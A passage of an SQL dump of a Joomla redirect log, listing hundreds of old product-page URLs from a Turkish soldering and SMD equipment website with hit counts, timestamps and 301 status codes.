00:00:00',301),(10192,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name?language=en-gb',NULL,'','',3,0,'2017-11-08 17:13:25','0000-00-00 00:00:00',301),(10193,'http://www.3s-technologies.com.tr/tr/images/stories/wawalo.gif',NULL,'','',2,0,'2017-11-08 17:17:19','0000-00-00 00:00:00',301),(10194,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar//images/stories/wawalo.gif',NULL,'','',1,0,'2017-11-08 17:17:37','0000-00-00 00:00:00',301),(10195,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim',NULL,'','',31,0,'2017-11-08 17:20:58','0000-00-00 00:00:00',301),(10196,'http://3s-technologies.com.tr/tr/urunler/rh2-20-detail?tmpl=component&print=1',NULL,'','',18,0,'2017-11-08 17:21:12','0000-00-00 00:00:00',301),(10197,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name',NULL,'','',18,0,'2017-11-08 17:32:22','0000-00-00 00:00:00',301),(10198,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-08 17:37:30','0000-00-00 00:00:00',301),(10199,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-08 17:40:15','0000-00-00 00:00:00',301),(10200,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name?language=tr-tr',NULL,'','',1,0,'2017-11-08 17:40:18','0000-00-00 00:00:00',301),(10201,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,ordering',NULL,'','',411,0,'2017-11-08 17:40:26','0000-00-00 00:00:00',301),(10202,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/ess-310-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-08 17:47:13','0000-00-00 00:00:00',301),(10203,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name?language=en-gb',NULL,'','',4,0,'2017-11-08 17:49:38','0000-00-00 00:00:00',301),(10204,'https://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-08 17:49:46','0000-00-00 00:00:00',301),(10205,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/245-k100-28-29-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-08 17:49:49','0000-00-00 00:00:00',301),(10206,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-08 17:49:58','0000-00-00 00:00:00',301),(10207,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole?language=en-gb',NULL,'','',1,0,'2017-11-08 17:50:02','0000-00-00 00:00:00',301),(10208,'https://www.3s-technologies.com.tr/tr/urunler/manufacturer/kester',NULL,'','',2,0,'2017-11-08 17:50:05','0000-00-00 00:00:00',301),(10209,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/mx200lp-detail',NULL,'','',181,0,'2017-11-08 17:50:22','0000-00-00 00:00:00',301),(10210,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by?language=en-gb&product_name/dirdesc',NULL,'','',1,0,'2017-11-08 17:50:24','0000-00-00 00:00:00',301),(10211,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by?language=en-gb&product_name/dirdesc',NULL,'','',1,0,'2017-11-08 17:50:27','0000-00-00 00:00:00',301),(10212,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/dirdesc',NULL,'','',2,0,'2017-11-08 17:50:35','0000-00-00 00:00:00',301),(10213,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by,category_name?language=en-gb',NULL,'','',9,0,'2017-11-08 17:50:36','0000-00-00 00:00:00',301),(10214,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by?language=en-gb&mf_name/dirdesc',NULL,'','',1,0,'2017-11-08 17:50:38','0000-00-00 00:00:00',301),(10215,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',11,0,'2017-11-08 17:50:44','0000-00-00 00:00:00',301),(10216,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-08 17:50:45','0000-00-00 00:00:00',301),(10217,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/rh6-detail',NULL,'','',1,0,'2017-11-08 17:50:49','0000-00-00 00:00:00',301),(10218,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name',NULL,'','',6,0,'2017-11-08 17:50:54','0000-00-00 00:00:00',301),(10219,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/dirdesc',NULL,'','',1,0,'2017-11-08 17:50:57','0000-00-00 00:00:00',301),(10220,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo',NULL,'','',8,0,'2017-11-08 17:50:57','0000-00-00 00:00:00',301),(10221,'http://www.3s-technologies.com.tr/index.php/en/products/through-hole-makineleri',NULL,'','',1,0,'2017-11-08 17:51:05','0000-00-00 00:00:00',301),(10222,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name?language=en-gb',NULL,'','',10,0,'2017-11-08 17:51:09','0000-00-00 00:00:00',301),(10223,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by?language=en-gb&product_name/dirdesc',NULL,'','',1,0,'2017-11-08 17:51:15','0000-00-00 00:00:00',301),(10224,'https://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-08 17:51:15','0000-00-00 00:00:00',301),(10225,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/dirdesc',NULL,'','',1,0,'2017-11-08 17:51:17','0000-00-00 00:00:00',301),(10226,'https://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by?error=404&language=en-gb&product_name',NULL,'','',1,0,'2017-11-08 17:51:19','0000-00-00 00:00:00',301),(10227,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-08 17:51:23','0000-00-00 00:00:00',301),(10228,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/thru-hole/dirdesc',NULL,'','',1,0,'2017-11-08 17:51:35','0000-00-00 00:00:00',301),(10229,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-08 17:51:39','0000-00-00 00:00:00',301),(10230,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by?category_name/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-08 17:51:51','0000-00-00 00:00:00',301),(10231,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',10,0,'2017-11-08 17:51:53','0000-00-00 00:00:00',301),(10232,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/rh2-20-detail?tmpl=component&print=1',NULL,'','',2,0,'2017-11-08 17:51:53','0000-00-00 00:00:00',301),(10233,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by?category_name/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-08 17:51:57','0000-00-00 00:00:00',301),(10234,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-08 17:52:00','0000-00-00 00:00:00',301),(10235,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by?language=en-gb&product_name/dirdesc',NULL,'','',1,0,'2017-11-08 17:52:11','0000-00-00 00:00:00',301),(10236,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız',NULL,'','',241,0,'2017-11-08 17:52:23','0000-00-00 00:00:00',301),(10237,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by?`p`.product_sku&language=en-gb',NULL,'','',1,0,'2017-11-08 17:52:32','0000-00-00 00:00:00',301),(10238,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-08 17:52:35','0000-00-00 00:00:00',301),(10239,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/thru-hole/by,mf_name',NULL,'','',1,0,'2017-11-08 17:52:45','0000-00-00 00:00:00',301),(10240,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturers/tolo',NULL,'','',16,0,'2017-11-08 17:53:07','0000-00-00 00:00:00',301),(10241,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,category_name',NULL,'','',1,0,'2017-11-08 17:53:23','0000-00-00 00:00:00',301),(10242,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/ly-8c-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-08 17:53:59','0000-00-00 00:00:00',301),(10243,'http://3s-technologies.com.tr/en/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',7,0,'2017-11-08 17:59:01','0000-00-00 00:00:00',301),(10244,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-08 18:09:15','0000-00-00 00:00:00',301),(10245,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-08 18:12:12','0000-00-00 00:00:00',301),(10246,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,category_name?language=en-gb',NULL,'','',8,0,'2017-11-08 18:14:53','0000-00-00 00:00:00',301),(10247,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',646,0,'2017-11-08 18:22:44','0000-00-00 00:00:00',301),(10248,'http://3s-technologies.com.tr/en/products/2.-el-makineler/dirdesc',NULL,'','',16,0,'2017-11-08 18:33:10','0000-00-00 00:00:00',301),(10249,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,ordering?error=404&language=en-gb',NULL,'','',1,0,'2017-11-08 18:36:43','0000-00-00 00:00:00',301),(10250,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by?`p`.product_sku&language=en-gb',NULL,'','',1,0,'2017-11-08 18:37:22','0000-00-00 00:00:00',301),(10251,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-08 18:41:15','0000-00-00 00:00:00',301),(10252,'http://www.3s-technologies.com.tr/en/products/smd-dã¼åÿã¼k-hä±zlä±',NULL,'','',17,0,'2017-11-08 18:48:32','0000-00-00 00:00:00',301),(10253,'http://www.3s-technologies.com.tr/tr/urunler/cm-602-l-detail?tmpl=component&print=1',NULL,'','',29,0,'2017-11-08 18:50:57','0000-00-00 00:00:00',301),(10254,'http://www.3s-technologies.com.tr/en/products/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',35,0,'2017-11-08 18:53:15','0000-00-00 00:00:00',301),(10255,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-08 18:53:48','0000-00-00 00:00:00',301),(10256,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri',NULL,'','',73,0,'2017-11-08 18:59:14','0000-00-00 00:00:00',301),(10257,'http://www.3s-technologies.com.tr/index.php/en/products/rl132-detail?tmpl=component&print=1',NULL,'','',28,0,'2017-11-08 19:00:37','0000-00-00 00:00:00',301),(10258,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/mx200lp-3-detail',NULL,'','',58,0,'2017-11-08 19:03:34','0000-00-00 00:00:00',301),(10259,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,ordering?language=tr-tr',NULL,'','',1,0,'2017-11-08 19:06:11','0000-00-00 00:00:00',301),(10260,'https://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,`p`.product_sku/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-08 19:07:20','0000-00-00 00:00:00',301),(10261,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/ess-310-detail',NULL,'','',217,0,'2017-11-08 19:08:44','0000-00-00 00:00:00',301),(10262,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by?`p`.product_sku&language=en-gb',NULL,'','',1,0,'2017-11-08 19:10:13','0000-00-00 00:00:00',301),(10263,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri',NULL,'','',105,0,'2017-11-08 19:18:53','0000-00-00 00:00:00',301),(10264,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/mi-300-detail',NULL,'','',53,0,'2017-11-08 19:28:55','0000-00-00 00:00:00',301),(10265,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name?language=en-gb',NULL,'','',10,0,'2017-11-08 19:36:41','0000-00-00 00:00:00',301),(10266,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/dirdesc',NULL,'','',29,0,'2017-11-08 19:48:53','0000-00-00 00:00:00',301),(10267,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim',NULL,'','',23,0,'2017-11-08 19:55:36','0000-00-00 00:00:00',301),(10268,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',26,0,'2017-11-08 20:04:07','0000-00-00 00:00:00',301),(10269,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim-31-32-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-11-08 20:24:25','0000-00-00 00:00:00',301),(10270,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,category_name?language=tr-tr',NULL,'','',29,0,'2017-11-08 20:30:07','0000-00-00 00:00:00',301),(10271,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-08 20:41:36','0000-00-00 00:00:00',301),(10272,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/ess-310-detail',NULL,'','',9,0,'2017-11-08 20:44:23','0000-00-00 00:00:00',301),(10273,'http://3s-technologies.com.tr/tr/urunler/manufacturers/ddm-novastar',NULL,'','',52,0,'2017-11-08 20:54:34','0000-00-00 00:00:00',301),(10274,'http://www.3s-technologies.com.tr/tr/urunler/ly-8c-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-08 21:09:29','0000-00-00 00:00:00',301),(10275,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/ess-310-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-08 21:09:55','0000-00-00 00:00:00',301),(10276,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/cs40-detail',NULL,'','',77,0,'2017-11-08 21:14:17','0000-00-00 00:00:00',301),(10277,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,product_name/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-08 21:16:03','0000-00-00 00:00:00',301),(10278,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,mf_name/dirdesc?language=tr-tr',NULL,'','',27,0,'2017-11-08 21:22:50','0000-00-00 00:00:00',301),(10279,'http://3s-technologies.com.tr/en/contacts-en',NULL,'','',32,0,'2017-11-08 21:50:33','0000-00-00 00:00:00',301),(10280,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',1,0,'2017-11-08 22:07:55','0000-00-00 00:00:00',301),(10281,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,product_name?language=tr-tr',NULL,'','',24,0,'2017-11-08 22:33:36','0000-00-00 00:00:00',301),(10282,'http://www.3s-technologies.com.tr/tr/urunler/smd-fä±rä±n/gf-12-hc-ht-detail',NULL,'','',2,0,'2017-11-08 22:33:40','0000-00-00 00:00:00',301),(10283,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,mf_name?language=en-gb',NULL,'','',24,0,'2017-11-08 22:44:30','0000-00-00 00:00:00',301),(10284,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole',NULL,'','',30,0,'2017-11-08 22:54:22','0000-00-00 00:00:00',301),(10285,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/dirdesc',NULL,'','',7,0,'2017-11-08 22:58:54','0000-00-00 00:00:00',301),(10286,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/flux/dirdesc',NULL,'','',1,0,'2017-11-08 22:59:41','0000-00-00 00:00:00',301),(10287,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,product_sku?language=tr-tr',NULL,'','',28,0,'2017-11-08 23:01:16','0000-00-00 00:00:00',301),(10288,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',10,0,'2017-11-08 23:01:21','0000-00-00 00:00:00',301),(10289,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name',NULL,'','',34,0,'2017-11-08 23:22:23','0000-00-00 00:00:00',301),(10290,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',31,0,'2017-11-08 23:22:28','0000-00-00 00:00:00',301),(10291,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/jv131_250x250.jpg',NULL,'','',2,0,'2017-11-08 23:24:21','0000-00-00 00:00:00',301),(10292,'http://www.3s-technologies.com.tr/tr/urunler/manufacturers/panasonic',NULL,'','',96,0,'2017-11-08 23:28:27','0000-00-00 00:00:00',301),(10293,'http://3s-technologies.com.tr/en/home2?format=feed&type=rss',NULL,'','',3,0,'2017-11-08 23:29:48','0000-00-00 00:00:00',301),(10294,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-08 23:44:33','0000-00-00 00:00:00',301),(10295,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-08 23:46:42','0000-00-00 00:00:00',301),(10296,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/955lc-37-detail',NULL,'','',25,0,'2017-11-08 23:57:33','0000-00-00 00:00:00',301),(10297,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/dirdesc',NULL,'','',21,0,'2017-11-09 00:01:48','0000-00-00 00:00:00',301),(10298,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,ordering?language=en-gb',NULL,'','',25,0,'2017-11-09 00:07:16','0000-00-00 00:00:00',301),(10299,'http://3s-technologies.com.tr/tr/urunler/cs40-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-09 00:19:02','0000-00-00 00:00:00',301),(10300,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/zero-ion-g3-detail/askquestion?tmpl=component',NULL,'','',26,0,'2017-11-09 00:30:11','0000-00-00 00:00:00',301),(10301,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/spartan-8s-8d-detail',NULL,'','',31,0,'2017-11-09 00:36:04','0000-00-00 00:00:00',301),(10302,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/ls60v-detail',NULL,'','',5,0,'2017-11-09 00:39:44','0000-00-00 00:00:00',301),(10303,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim?language=en-gb',NULL,'','',2,0,'2017-11-09 00:56:29','0000-00-00 00:00:00',301),(10304,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',24,0,'2017-11-09 01:17:39','0000-00-00 00:00:00',301),(10305,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/mx200lp-3-detail',NULL,'','',1,0,'2017-11-09 01:31:39','0000-00-00 00:00:00',301),(10306,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-09 01:32:48','0000-00-00 00:00:00',301),(10307,'http://3s-technologies.com.tr/index.php/en/products/955lc-37-detail?print=1&tmpl=component',NULL,'','',3,0,'2017-11-09 01:37:43','0000-00-00 00:00:00',301),(10308,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',24,0,'2017-11-09 02:03:47','0000-00-00 00:00:00',301),(10309,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',10,0,'2017-11-09 02:05:26','0000-00-00 00:00:00',301),(10310,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,product_name?language=en-gb',NULL,'','',19,0,'2017-11-09 02:08:47','0000-00-00 00:00:00',301),(10311,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',209,0,'2017-11-09 02:19:39','0000-00-00 00:00:00',301),(10312,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,mf_name?language=tr-tr',NULL,'','',35,0,'2017-11-09 02:22:02','0000-00-00 00:00:00',301),(10313,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail/askquestion?tmpl=component',NULL,'','',23,0,'2017-11-09 02:32:47','0000-00-00 00:00:00',301),(10314,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail/askquestion?tmpl=component',NULL,'','',26,0,'2017-11-09 02:34:43','0000-00-00 00:00:00',301),(10315,'http://3s-technologies.com.tr/en/products/manufacturer/screen-printer',NULL,'','',19,0,'2017-11-09 02:52:00','0000-00-00 00:00:00',301),(10316,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,category_name?language=tr-tr',NULL,'','',2,0,'2017-11-09 02:53:06','0000-00-00 00:00:00',301),(10317,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/avb-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-09 03:21:52','0000-00-00 00:00:00',301),(10318,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',539,0,'2017-11-09 03:40:33','0000-00-00 00:00:00',301),(10319,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',536,0,'2017-11-09 03:40:36','0000-00-00 00:00:00',301),(10320,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',538,0,'2017-11-09 03:40:51','0000-00-00 00:00:00',301),(10321,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',537,0,'2017-11-09 03:40:53','0000-00-00 00:00:00',301),(10322,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',530,0,'2017-11-09 03:41:02','0000-00-00 00:00:00',301),(10323,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',534,0,'2017-11-09 03:41:04','0000-00-00 00:00:00',301),(10324,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',538,0,'2017-11-09 03:41:13','0000-00-00 00:00:00',301),(10325,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',541,0,'2017-11-09 03:41:19','0000-00-00 00:00:00',301),(10326,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',536,0,'2017-11-09 03:41:25','0000-00-00 00:00:00',301),(10327,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,ordering',NULL,'','',533,0,'2017-11-09 03:41:33','0000-00-00 00:00:00',301),(10328,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,product_name',NULL,'','',535,0,'2017-11-09 03:41:37','0000-00-00 00:00:00',301),(10329,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',537,0,'2017-11-09 03:41:41','0000-00-00 00:00:00',301),(10330,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,product_sku',NULL,'','',534,0,'2017-11-09 03:41:47','0000-00-00 00:00:00',301),(10331,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/cs40-detail',NULL,'','',264,0,'2017-11-09 03:41:54','0000-00-00 00:00:00',301),(10332,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',265,0,'2017-11-09 03:41:57','0000-00-00 00:00:00',301),(10333,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/dirdesc',NULL,'','',532,0,'2017-11-09 03:42:00','0000-00-00 00:00:00',301),(10334,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/le-40v-detail',NULL,'','',266,0,'2017-11-09 03:42:04','0000-00-00 00:00:00',301),(10335,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',264,0,'2017-11-09 03:42:07','0000-00-00 00:00:00',301),(10336,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/ls60v-detail',NULL,'','',264,0,'2017-11-09 03:42:11','0000-00-00 00:00:00',301),(10337,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',268,0,'2017-11-09 03:42:13','0000-00-00 00:00:00',301),(10338,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın',NULL,'','',543,0,'2017-11-09 03:42:20','0000-00-00 00:00:00',301),(10339,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,`p`.product_sku',NULL,'','',543,0,'2017-11-09 03:42:23','0000-00-00 00:00:00',301),(10340,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',531,0,'2017-11-09 03:42:26','0000-00-00 00:00:00',301),(10341,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,category_name',NULL,'','',534,0,'2017-11-09 03:42:32','0000-00-00 00:00:00',301),(10342,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,category_name/dirdesc',NULL,'','',533,0,'2017-11-09 03:42:34','0000-00-00 00:00:00',301),(10343,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,mf_name',NULL,'','',540,0,'2017-11-09 03:42:41','0000-00-00 00:00:00',301),(10344,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,mf_name/dirdesc',NULL,'','',536,0,'2017-11-09 03:42:43','0000-00-00 00:00:00',301),(10345,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,ordering',NULL,'','',537,0,'2017-11-09 03:42:50','0000-00-00 00:00:00',301),(10346,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,product_name',NULL,'','',538,0,'2017-11-09 03:42:56','0000-00-00 00:00:00',301),(10347,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,product_name/dirdesc',NULL,'','',543,0,'2017-11-09 03:42:59','0000-00-00 